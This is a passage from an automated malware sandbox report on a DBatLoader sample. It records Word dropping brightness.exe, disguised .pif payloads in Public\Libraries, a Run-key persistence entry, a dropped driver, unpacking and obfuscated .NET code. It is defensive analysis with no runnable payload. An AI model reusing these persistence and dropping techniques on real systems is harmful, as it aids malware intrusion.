00000010.00000003.2324913590.000000000084E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: easinvoker.pdb source: brightness.exe, 00000007.00000002.2161329052.00000000214AA000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2158197461.0000000020490000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2123335576.000000007F410000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.000000002064A000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020590000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: _.pdb source: jphwmyiA.pif, 0000000A.00000002.3757907587.0000000020D49000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000003.2131092317.000000001F2F1000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000003.2260610637.000000001A4A2000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3757413723.000000001BE09000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000003.2273558803.000000001A4F6000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758412970.0000000022509000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000003.2349806215.0000000020806000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: easinvoker.pdbGCTL source: brightness.exe, 00000007.00000002.2161329052.00000000214AA000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2158197461.0000000020490000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2160861366.0000000021382000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2124248184.0000000000741000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2123335576.000000007F410000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000003.2245722852.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.000000002064A000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000003.2245722852.0000000000874000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020590000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324467170.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324467170.0000000000821000.00000004.00000020.00020000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  Detected unpacking (changes PE section rights)
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifUnpacked PE file: 10.2.jphwmyiA.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifUnpacked PE file: 15.2.jphwmyiA.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifUnpacked PE file: 19.2.jphwmyiA.pif.400000.1.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                  Detected unpacking (overwrites its own PE header)
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifUnpacked PE file: 10.2.jphwmyiA.pif.400000.0.unpack
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifUnpacked PE file: 15.2.jphwmyiA.pif.400000.0.unpack
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifUnpacked PE file: 19.2.jphwmyiA.pif.400000.1.unpack
                  Yara detected DBatLoader
                  Source: Yara matchFile source: 7.2.brightness.exe.20f65a8.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.brightness.exe.27b0000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.brightness.exe.20f65a8.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000007.00000002.2166181878.000000007FBB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.2130519568.00000000020F6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000001.2327344722.0000000000B90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.3731678723.0000000000B90000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.3731530309.0000000000C20000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000001.2128731771.0000000000C20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000001.2248691179.0000000000B90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.3731782871.0000000000B90000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  .NET source code contains method to dynamically call methods (often used by packers)
                  Source: 10.2.jphwmyiA.pif.23600ee8.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 10.2.jphwmyiA.pif.23660000.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 10.3.jphwmyiA.pif.1f2f18e0.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 10.2.jphwmyiA.pif.20d8a8c6.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 15.2.jphwmyiA.pif.1be4a8c6.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 15.2.jphwmyiA.pif.1e710ee8.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 15.2.jphwmyiA.pif.1ed60000.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: jphwmyiA.pif.7.drStatic PE information: 0x7BBD3E91 [Sun Oct 14 18:38:09 2035 UTC]
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027C8798 LoadLibraryW,GetProcAddress,FreeLibrary,7_2_027C8798
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027DD2FC push 027DD367h; ret 7_2_027DD35F
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027B32FC push eax; ret 7_2_027B3338
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027B635A push 027B63B7h; ret 7_2_027B63AF
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027B635C push 027B63B7h; ret 7_2_027B63AF
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027DD0AC push 027DD125h; ret 7_2_027DD11D
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027DD144 push 027DD1ECh; ret 7_2_027DD1E4
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027DD1F8 push 027DD288h; ret 7_2_027DD280
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027C86B8 push 027C86FAh; ret 7_2_027C86F2
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027B6738 push 027B677Ah; ret 7_2_027B6772
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027B6736 push 027B677Ah; ret 7_2_027B6772
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027BC4EC push ecx; mov dword ptr [esp], edx7_2_027BC4F1
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027BD520 push 027BD54Ch; ret 7_2_027BD544
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027BCB6C push 027BCCF2h; ret 7_2_027BCCEA
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027C68C8 push 027C6973h; ret 7_2_027C696B
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027C68C6 push 027C6973h; ret 7_2_027C696B
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027C788C push 027C7909h; ret 7_2_027C7901
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027CA918 push 027CA950h; ret 7_2_027CA948
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027CA917 push 027CA950h; ret 7_2_027CA948
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027C8910 push 027C8948h; ret 7_2_027C8940
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027C890E push 027C8948h; ret 7_2_027C8940
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027CE9E8 push ecx; mov dword ptr [esp], edx7_2_027CE9ED
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027BC9CF push 027BCCF2h; ret 7_2_027BCCEA
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027C2EE0 push 027C2F56h; ret 7_2_027C2F4E
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027C2FEC push 027C3039h; ret 7_2_027C3031
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027C2FEB push 027C3039h; ret 7_2_027C3031
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027DBFA0 push 027DC1C8h; ret 7_2_027DC1C0
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027C5DFC push ecx; mov dword ptr [esp], edx7_2_027C5DFE
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_3_238787DB push es; iretd 10_3_23878A0E
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_0041C40C push cs; iretd 10_2_0041C4E2
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_00423149 push eax; ret 10_2_00423179
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_0041C50E push cs; iretd 10_2_0041C4E2
                  Source: 10.2.jphwmyiA.pif.23600ee8.4.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'Um61XJt4G2w4U', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 10.2.jphwmyiA.pif.23660000.6.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'Um61XJt4G2w4U', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 10.3.jphwmyiA.pif.1f2f18e0.0.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'Um61XJt4G2w4U', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 10.2.jphwmyiA.pif.20d8a8c6.2.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'Um61XJt4G2w4U', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 15.2.jphwmyiA.pif.1be4a8c6.2.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'Um61XJt4G2w4U', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 15.2.jphwmyiA.pif.1e710ee8.4.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'Um61XJt4G2w4U', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 15.2.jphwmyiA.pif.1ed60000.6.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'Um61XJt4G2w4U', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

                  Persistence and Installation Behavior

                  barindex
                  Drops PE files with a suspicious file extension
                  Source: C:\Windows\SysWOW64\brightness.exeFile created: C:\Users\Public\Libraries\jphwmyiA.pifJump to dropped file
                  Source: C:\Windows\SysWOW64\brightness.exeFile created: C:\Users\Public\Libraries\Aiymwhpj.PIFJump to dropped file
                  Drops executables to the windows directory (C:\Windows) and starts them
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEExecutable created and started: C:\Windows\SysWOW64\brightness.exeJump to behavior
                  Sample is not signed and drops a device driver
                  Source: C:\Windows\SysWOW64\brightness.exeFile created: C:\Windows \SysWOW64\truesight.sysJump to behavior
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFFile created: C:\Windows \SysWOW64\truesight.sys
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFFile created: C:\Windows \SysWOW64\truesight.sys
                  Source: C:\Windows\SysWOW64\brightness.exeFile created: C:\Users\Public\Libraries\jphwmyiA.pifJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Windows\SysWOW64\brightness.exeJump to dropped file
                  Source: C:\Windows\SysWOW64\brightness.exeFile created: C:\Users\Public\Libraries\Aiymwhpj.PIFJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Windows\SysWOW64\brightness.exeJump to dropped file
                  Source: C:\Windows\SysWOW64\brightness.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AiymwhpjJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AiymwhpjJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027CA954 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,7_2_027CA954
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
